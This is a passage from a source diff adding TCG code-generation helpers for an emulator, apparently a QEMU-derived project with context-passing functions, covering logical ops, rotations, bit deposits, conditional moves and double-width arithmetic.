tcg_gen_shri_i64(s, t1, arg, 8); + tcg_gen_andi_i64(s, t1, t1, 0xff000000); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 24); + tcg_gen_andi_i64(s, t1, t1, 0x00ff0000); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 40); + tcg_gen_andi_i64(s, t1, t1, 0x0000ff00); + tcg_gen_or_i64(s, t0, t0, t1); + + tcg_gen_shri_i64(s, t1, arg, 56); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +#endif + +static inline void tcg_gen_neg_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_neg_i32) { + tcg_gen_op2_i32(s, INDEX_op_neg_i32, ret, arg); + } else { + TCGv_i32 t0 = tcg_const_i32(s, 0); + tcg_gen_sub_i32(s, ret, t0, arg); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_neg_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (TCG_TARGET_HAS_neg_i64) { + tcg_gen_op2_i64(s, INDEX_op_neg_i64, ret, arg); + } else { + TCGv_i64 t0 = tcg_const_i64(s, 0); + tcg_gen_sub_i64(s, ret, t0, arg); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_not_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (TCG_TARGET_HAS_not_i32) { + tcg_gen_op2_i32(s, INDEX_op_not_i32, ret, arg); + } else { + tcg_gen_xori_i32(s, ret, arg, -1); + } +} + +static inline void tcg_gen_not_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_not_i64) { + tcg_gen_op2_i64(s, INDEX_op_not_i64, ret, arg); + } else { + tcg_gen_xori_i64(s, ret, arg, -1); + } +#else + tcg_gen_not_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_not_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg)); +#endif +} + +static inline void tcg_gen_discard_i32(TCGContext *s, TCGv_i32 arg) +{ + tcg_gen_op1_i32(s, INDEX_op_discard, arg); +} + +static inline void tcg_gen_discard_i64(TCGContext *s, TCGv_i64 arg) +{ +#if TCG_TARGET_REG_BITS == 32 + tcg_gen_discard_i32(s, TCGV_LOW(arg)); + tcg_gen_discard_i32(s, TCGV_HIGH(arg)); +#else + tcg_gen_op1_i64(s, 
INDEX_op_discard, arg); +#endif +} + +static inline void tcg_gen_andc_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_andc_i32) { + tcg_gen_op3_i32(s, INDEX_op_andc_i32, ret, arg1, arg2); + } else { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_not_i32(s, t0, arg2); + tcg_gen_and_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_andc_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_andc_i64) { + tcg_gen_op3_i64(s, INDEX_op_andc_i64, ret, arg1, arg2); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_not_i64(s, t0, arg2); + tcg_gen_and_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +#else + tcg_gen_andc_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_andc_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_eqv_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_eqv_i32) { + tcg_gen_op3_i32(s, INDEX_op_eqv_i32, ret, arg1, arg2); + } else { + tcg_gen_xor_i32(s, ret, arg1, arg2); + tcg_gen_not_i32(s, ret, ret); + } +} + +static inline void tcg_gen_eqv_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_eqv_i64) { + tcg_gen_op3_i64(s, INDEX_op_eqv_i64, ret, arg1, arg2); + } else { + tcg_gen_xor_i64(s, ret, arg1, arg2); + tcg_gen_not_i64(s, ret, ret); + } +#else + tcg_gen_eqv_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_eqv_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_nand_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_nand_i32) { + tcg_gen_op3_i32(s, INDEX_op_nand_i32, ret, arg1, arg2); + } else { + tcg_gen_and_i32(s, ret, arg1, arg2); + tcg_gen_not_i32(s, ret, ret); + } +} + +static inline void tcg_gen_nand_i64(TCGContext *s, TCGv_i64 
ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_nand_i64) { + tcg_gen_op3_i64(s, INDEX_op_nand_i64, ret, arg1, arg2); + } else { + tcg_gen_and_i64(s, ret, arg1, arg2); + tcg_gen_not_i64(s, ret, ret); + } +#else + tcg_gen_nand_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_nand_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_nor_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_nor_i32) { + tcg_gen_op3_i32(s, INDEX_op_nor_i32, ret, arg1, arg2); + } else { + tcg_gen_or_i32(s, ret, arg1, arg2); + tcg_gen_not_i32(s, ret, ret); + } +} + +static inline void tcg_gen_nor_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_nor_i64) { + tcg_gen_op3_i64(s, INDEX_op_nor_i64, ret, arg1, arg2); + } else { + tcg_gen_or_i64(s, ret, arg1, arg2); + tcg_gen_not_i64(s, ret, ret); + } +#else + tcg_gen_nor_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_nor_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_orc_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_orc_i32) { + tcg_gen_op3_i32(s, INDEX_op_orc_i32, ret, arg1, arg2); + } else { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_not_i32(s, t0, arg2); + tcg_gen_or_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_orc_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ +#if TCG_TARGET_REG_BITS == 64 + if (TCG_TARGET_HAS_orc_i64) { + tcg_gen_op3_i64(s, INDEX_op_orc_i64, ret, arg1, arg2); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_not_i64(s, t0, arg2); + tcg_gen_or_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } +#else + tcg_gen_orc_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_orc_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), 
TCGV_HIGH(arg2)); +#endif +} + +static inline void tcg_gen_rotl_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_rot_i32) { + tcg_gen_op3_i32(s, INDEX_op_rotl_i32, ret, arg1, arg2); + } else { + TCGv_i32 t0, t1; + + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + tcg_gen_shl_i32(s, t0, arg1, arg2); + tcg_gen_subfi_i32(s, t1, 32, arg2); + tcg_gen_shr_i32(s, t1, arg1, t1); + tcg_gen_or_i32(s, ret, t0, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +static inline void tcg_gen_rotl_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_rot_i64) { + tcg_gen_op3_i64(s, INDEX_op_rotl_i64, ret, arg1, arg2); + } else { + TCGv_i64 t0, t1; + t0 = tcg_temp_new_i64(s); + t1 = tcg_temp_new_i64(s); + tcg_gen_shl_i64(s, t0, arg1, arg2); + tcg_gen_subfi_i64(s, t1, 64, arg2); + tcg_gen_shr_i64(s, t1, arg1, t1); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_rotli_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else if (TCG_TARGET_HAS_rot_i32) { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_rotl_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } else { + TCGv_i32 t0, t1; + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + tcg_gen_shli_i32(s, t0, arg1, arg2); + tcg_gen_shri_i32(s, t1, arg1, 32 - arg2); + tcg_gen_or_i32(s, ret, t0, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +static inline void tcg_gen_rotli_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else if (TCG_TARGET_HAS_rot_i64) { + TCGv_i64 t0 = tcg_const_i64(s, arg2); + tcg_gen_rotl_i64(s, ret, arg1, t0); + tcg_temp_free_i64(s, t0); + } else { + TCGv_i64 t0, t1; + t0 = 
tcg_temp_new_i64(s); + t1 = tcg_temp_new_i64(s); + tcg_gen_shli_i64(s, t0, arg1, arg2); + tcg_gen_shri_i64(s, t1, arg1, 64 - arg2); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_rotr_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_rot_i32) { + tcg_gen_op3_i32(s, INDEX_op_rotr_i32, ret, arg1, arg2); + } else { + TCGv_i32 t0, t1; + + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + tcg_gen_shr_i32(s, t0, arg1, arg2); + tcg_gen_subfi_i32(s, t1, 32, arg2); + tcg_gen_shl_i32(s, t1, arg1, t1); + tcg_gen_or_i32(s, ret, t0, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +static inline void tcg_gen_rotr_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_rot_i64) { + tcg_gen_op3_i64(s, INDEX_op_rotr_i64, ret, arg1, arg2); + } else { + TCGv_i64 t0, t1; + t0 = tcg_temp_new_i64(s); + t1 = tcg_temp_new_i64(s); + tcg_gen_shr_i64(s, t0, arg1, arg2); + tcg_gen_subfi_i64(s, t1, 64, arg2); + tcg_gen_shl_i64(s, t1, arg1, t1); + tcg_gen_or_i64(s, ret, t0, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_rotri_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + tcg_gen_rotli_i32(s, ret, arg1, 32 - arg2); + } +} + +static inline void tcg_gen_rotri_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i64(s, ret, arg1); + } else { + tcg_gen_rotli_i64(s, ret, arg1, 64 - arg2); + } +} + +static inline void tcg_gen_deposit_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, + TCGv_i32 arg2, unsigned int ofs, + unsigned int len) +{ + uint32_t mask; + TCGv_i32 t1; + + tcg_debug_assert(ofs < 32); + tcg_debug_assert(len <= 32); + tcg_debug_assert(ofs + len <= 32); + + 
if (ofs == 0 && len == 32) { + tcg_gen_mov_i32(s, ret, arg2); + return; + } + if (TCG_TARGET_HAS_deposit_i32 && TCG_TARGET_deposit_i32_valid(ofs, len)) { + tcg_gen_op5ii_i32(s, INDEX_op_deposit_i32, ret, arg1, arg2, ofs, len); + return; + } + + mask = (1u << (len & 0x1f)) - 1; + t1 = tcg_temp_new_i32(s); + + if (ofs + len < 32) { + tcg_gen_andi_i32(s, t1, arg2, mask); + tcg_gen_shli_i32(s, t1, t1, ofs); + } else { + tcg_gen_shli_i32(s, t1, arg2, ofs); + } + tcg_gen_andi_i32(s, ret, arg1, ~(mask << ofs)); + tcg_gen_or_i32(s, ret, ret, t1); + + tcg_temp_free_i32(s, t1); +} + +static inline void tcg_gen_deposit_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, + TCGv_i64 arg2, unsigned int ofs, + unsigned int len) +{ + uint64_t mask; + TCGv_i64 t1; + + tcg_debug_assert(ofs < 64); + tcg_debug_assert(len <= 64); + tcg_debug_assert(ofs + len <= 64); + + if (ofs == 0 && len == 64) { + tcg_gen_mov_i64(s, ret, arg2); + return; + } + if (TCG_TARGET_HAS_deposit_i64 && TCG_TARGET_deposit_i64_valid(ofs, len)) { + tcg_gen_op5ii_i64(s, INDEX_op_deposit_i64, ret, arg1, arg2, ofs, len); + return; + } + +#if TCG_TARGET_REG_BITS == 32 + if (ofs >= 32) { + tcg_gen_deposit_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), + TCGV_LOW(arg2), ofs - 32, len); + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1)); + return; + } + if (ofs + len <= 32) { + tcg_gen_deposit_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), + TCGV_LOW(arg2), ofs, len); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1)); + return; + } +#endif + + mask = (1ull << len) - 1; + t1 = tcg_temp_new_i64(s); + + if (ofs + len < 64) { + tcg_gen_andi_i64(s, t1, arg2, mask); + tcg_gen_shli_i64(s, t1, t1, ofs); + } else { + tcg_gen_shli_i64(s, t1, arg2, ofs); + } + tcg_gen_andi_i64(s, ret, arg1, ~(mask << ofs)); + tcg_gen_or_i64(s, ret, ret, t1); + + tcg_temp_free_i64(s, t1); +} + +static inline void tcg_gen_concat_i32_i64(TCGContext *s, TCGv_i64 dest, TCGv_i32 low, + TCGv_i32 high) +{ +#if TCG_TARGET_REG_BITS == 32 + tcg_gen_mov_i32(s, 
TCGV_LOW(dest), low); + tcg_gen_mov_i32(s, TCGV_HIGH(dest), high); +#else + TCGv_i64 tmp = tcg_temp_new_i64(s); + /* These extensions are only needed for type correctness. + We may be able to do better given target specific information. */ + tcg_gen_extu_i32_i64(s, tmp, high); + tcg_gen_extu_i32_i64(s, dest, low); + /* If deposit is available, use it. Otherwise use the extra + knowledge that we have of the zero-extensions above. */ + if (TCG_TARGET_HAS_deposit_i64 && TCG_TARGET_deposit_i64_valid(32, 32)) { + tcg_gen_deposit_i64(s, dest, dest, tmp, 32, 32); + } else { + tcg_gen_shli_i64(s, tmp, tmp, 32); + tcg_gen_or_i64(s, dest, dest, tmp); + } + tcg_temp_free_i64(s, tmp); +#endif +} + +static inline void tcg_gen_concat32_i64(TCGContext *s, TCGv_i64 dest, TCGv_i64 low, + TCGv_i64 high) +{ + tcg_gen_deposit_i64(s, dest, low, high, 32, 32); +} + +static inline void tcg_gen_trunc_i64_i32(TCGContext *s, TCGv_i32 ret, TCGv_i64 arg) +{ + tcg_gen_trunc_shr_i64_i32(s, ret, arg, 0); +} + +static inline void tcg_gen_extr_i64_i32(TCGContext *s, TCGv_i32 lo, TCGv_i32 hi, TCGv_i64 arg) +{ + tcg_gen_trunc_shr_i64_i32(s, lo, arg, 0); + tcg_gen_trunc_shr_i64_i32(s, hi, arg, 32); +} + +static inline void tcg_gen_extr32_i64(TCGContext *s, TCGv_i64 lo, TCGv_i64 hi, TCGv_i64 arg) +{ + tcg_gen_ext32u_i64(s, lo, arg); + tcg_gen_shri_i64(s, hi, arg, 32); +} + +static inline void tcg_gen_movcond_i32(TCGContext *s, TCGCond cond, TCGv_i32 ret, + TCGv_i32 c1, TCGv_i32 c2, + TCGv_i32 v1, TCGv_i32 v2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_mov_i32(s, ret, v1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_mov_i32(s, ret, v2); + } + else if (TCG_TARGET_HAS_movcond_i32) { + tcg_gen_op6i_i32(s, INDEX_op_movcond_i32, ret, c1, c2, v1, v2, cond); + } else { + TCGv_i32 t0 = tcg_temp_new_i32(s); + TCGv_i32 t1 = tcg_temp_new_i32(s); + tcg_gen_setcond_i32(s, cond, t0, c1, c2); + tcg_gen_neg_i32(s, t0, t0); + tcg_gen_and_i32(s, t1, v1, t0); + tcg_gen_andc_i32(s, ret, v2, t0); + 
tcg_gen_or_i32(s, ret, ret, t1); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} + +static inline void tcg_gen_movcond_i64(TCGContext *s, TCGCond cond, TCGv_i64 ret, + TCGv_i64 c1, TCGv_i64 c2, + TCGv_i64 v1, TCGv_i64 v2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_mov_i64(s, ret, v1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_mov_i64(s, ret, v2); + } + else { +#if TCG_TARGET_REG_BITS == 32 + TCGv_i32 t0 = tcg_temp_new_i32(s); + TCGv_i32 t1 = tcg_temp_new_i32(s); + tcg_gen_op6i_i32(s, INDEX_op_setcond2_i32, t0, + TCGV_LOW(c1), TCGV_HIGH(c1), + TCGV_LOW(c2), TCGV_HIGH(c2), cond); + + if (TCG_TARGET_HAS_movcond_i32) { + tcg_gen_movi_i32(s, t1, 0); + tcg_gen_movcond_i32(s, TCG_COND_NE, TCGV_LOW(ret), t0, t1, + TCGV_LOW(v1), TCGV_LOW(v2)); + tcg_gen_movcond_i32(s, TCG_COND_NE, TCGV_HIGH(ret), t0, t1, + TCGV_HIGH(v1), TCGV_HIGH(v2)); + } else { + tcg_gen_neg_i32(s, t0, t0); + + tcg_gen_and_i32(s, t1, TCGV_LOW(v1), t0); + tcg_gen_andc_i32(s, TCGV_LOW(ret), TCGV_LOW(v2), t0); + tcg_gen_or_i32(s, TCGV_LOW(ret), TCGV_LOW(ret), t1); + + tcg_gen_and_i32(s, t1, TCGV_HIGH(v1), t0); + tcg_gen_andc_i32(s, TCGV_HIGH(ret), TCGV_HIGH(v2), t0); + tcg_gen_or_i32(s, TCGV_HIGH(ret), TCGV_HIGH(ret), t1); + } + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + #else + if (TCG_TARGET_HAS_movcond_i64) { + tcg_gen_op6i_i64(s, INDEX_op_movcond_i64, ret, c1, c2, v1, v2, cond); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_setcond_i64(s, cond, t0, c1, c2); + tcg_gen_neg_i64(s, t0, t0); + tcg_gen_and_i64(s, t1, v1, t0); + tcg_gen_andc_i64(s, ret, v2, t0); + tcg_gen_or_i64(s, ret, ret, t1); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +#endif + } +} + +static inline void tcg_gen_add2_i32(TCGContext *s, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, + TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh) +{ + if (TCG_TARGET_HAS_add2_i32) { + tcg_gen_op6_i32(s, INDEX_op_add2_i32, rl, rh, al, ah, bl, bh); + /* Allow the optimizer 
room to replace add2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_concat_i32_i64(s, t0, al, ah); + tcg_gen_concat_i32_i64(s, t1, bl, bh); + tcg_gen_add_i64(s, t0, t0, t1); + tcg_gen_extr_i64_i32(s, rl, rh, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_sub2_i32(TCGContext *s, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, + TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh) +{ + if (TCG_TARGET_HAS_sub2_i32) { + tcg_gen_op6_i32(s, INDEX_op_sub2_i32, rl, rh, al, ah, bl, bh); + /* Allow the optimizer room to replace sub2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_concat_i32_i64(s, t0, al, ah); + tcg_gen_concat_i32_i64(s, t1, bl, bh); + tcg_gen_sub_i64(s, t0, t0, t1); + tcg_gen_extr_i64_i32(s, rl, rh, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_mulu2_i32(TCGContext *s, TCGv_i32 rl, TCGv_i32 rh, + TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_mulu2_i32) { + tcg_gen_op4_i32(s, INDEX_op_mulu2_i32, rl, rh, arg1, arg2); + /* Allow the optimizer room to replace mulu2 with two moves. 
*/ + tcg_gen_op0(s, INDEX_op_nop); + } else if (TCG_TARGET_HAS_muluh_i32) { + TCGv_i32 t = tcg_temp_new_i32(s); + tcg_gen_op3_i32(s, INDEX_op_mul_i32, t, arg1, arg2); + tcg_gen_op3_i32(s, INDEX_op_muluh_i32, rh, arg1, arg2); + tcg_gen_mov_i32(s, rl, t); + tcg_temp_free_i32(s, t); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_extu_i32_i64(s, t0, arg1); + tcg_gen_extu_i32_i64(s, t1, arg2); + tcg_gen_mul_i64(s, t0, t0, t1); + tcg_gen_extr_i64_i32(s, rl, rh, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_muls2_i32(TCGContext *s, TCGv_i32 rl, TCGv_i32 rh, + TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_muls2_i32) { + tcg_gen_op4_i32(s, INDEX_op_muls2_i32, rl, rh, arg1, arg2); + /* Allow the optimizer room to replace muls2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else if (TCG_TARGET_HAS_mulsh_i32) { + TCGv_i32 t = tcg_temp_new_i32(s); + tcg_gen_op3_i32(s, INDEX_op_mul_i32, t, arg1, arg2); + tcg_gen_op3_i32(s, INDEX_op_mulsh_i32, rh, arg1, arg2); + tcg_gen_mov_i32(s, rl, t); + tcg_temp_free_i32(s, t); + } else if (TCG_TARGET_REG_BITS == 32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + TCGv_i32 t1 = tcg_temp_new_i32(s); + TCGv_i32 t2 = tcg_temp_new_i32(s); + TCGv_i32 t3 = tcg_temp_new_i32(s); + tcg_gen_mulu2_i32(s, t0, t1, arg1, arg2); + /* Adjust for negative inputs. 
*/ + tcg_gen_sari_i32(s, t2, arg1, 31); + tcg_gen_sari_i32(s, t3, arg2, 31); + tcg_gen_and_i32(s, t2, t2, arg2); + tcg_gen_and_i32(s, t3, t3, arg1); + tcg_gen_sub_i32(s, rh, t1, t2); + tcg_gen_sub_i32(s, rh, rh, t3); + tcg_gen_mov_i32(s, rl, t0); + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + tcg_temp_free_i32(s, t2); + tcg_temp_free_i32(s, t3); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_ext_i32_i64(s, t0, arg1); + tcg_gen_ext_i32_i64(s, t1, arg2); + tcg_gen_mul_i64(s, t0, t0, t1); + tcg_gen_extr_i64_i32(s, rl, rh, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_add2_i64(TCGContext *s, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, + TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) +{ + if (TCG_TARGET_HAS_add2_i64) { + tcg_gen_op6_i64(s, INDEX_op_add2_i64, rl, rh, al, ah, bl, bh); + /* Allow the optimizer room to replace add2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_add_i64(s, t0, al, bl); + tcg_gen_setcond_i64(s, TCG_COND_LTU, t1, t0, al); + tcg_gen_add_i64(s, rh, ah, bh); + tcg_gen_add_i64(s, rh, rh, t1); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_sub2_i64(TCGContext *s, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, + TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) +{ + if (TCG_TARGET_HAS_sub2_i64) { + tcg_gen_op6_i64(s, INDEX_op_sub2_i64, rl, rh, al, ah, bl, bh); + /* Allow the optimizer room to replace sub2 with two moves. 
*/ + tcg_gen_op0(s, INDEX_op_nop); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + tcg_gen_sub_i64(s, t0, al, bl); + tcg_gen_setcond_i64(s, TCG_COND_LTU, t1, al, bl); + tcg_gen_sub_i64(s, rh, ah, bh); + tcg_gen_sub_i64(s, rh, rh, t1); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + } +} + +static inline void tcg_gen_mulu2_i64(TCGContext *s, TCGv_i64 rl, TCGv_i64 rh, + TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_mulu2_i64) { + tcg_gen_op4_i64(s, INDEX_op_mulu2_i64, rl, rh, arg1, arg2); + /* Allow the optimizer room to replace mulu2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else if (TCG_TARGET_HAS_muluh_i64) { + TCGv_i64 t = tcg_temp_new_i64(s); + tcg_gen_op3_i64(s, INDEX_op_mul_i64, t, arg1, arg2); + tcg_gen_op3_i64(s, INDEX_op_muluh_i64, rh, arg1, arg2); + tcg_gen_mov_i64(s, rl, t); + tcg_temp_free_i64(s, t); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_mul_i64(s, t0, arg1, arg2); + gen_helper_muluh_i64(s, rh, arg1, arg2); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + } +} + +static inline void tcg_gen_muls2_i64(TCGContext *s, TCGv_i64 rl, TCGv_i64 rh, + TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (TCG_TARGET_HAS_muls2_i64) { + tcg_gen_op4_i64(s, INDEX_op_muls2_i64, rl, rh, arg1, arg2); + /* Allow the optimizer room to replace muls2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else if (TCG_TARGET_HAS_mulsh_i64) { + TCGv_i64 t = tcg_temp_new_i64(s); + tcg_gen_op3_i64(s, INDEX_op_mul_i64, t, arg1, arg2); + tcg_gen_op3_i64(s, INDEX_op_mulsh_i64, rh, arg1, arg2); + tcg_gen_mov_i64(s, rl, t); + tcg_temp_free_i64(s, t); + } else if (TCG_TARGET_HAS_mulu2_i64 || TCG_TARGET_HAS_muluh_i64) { + TCGv_i64 t0 = tcg_temp_new_i64(s); + TCGv_i64 t1 = tcg_temp_new_i64(s); + TCGv_i64 t2 = tcg_temp_new_i64(s); + TCGv_i64 t3 = tcg_temp_new_i64(s); + tcg_gen_mulu2_i64(s, t0, t1, arg1, arg2); + /* Adjust for negative inputs. 
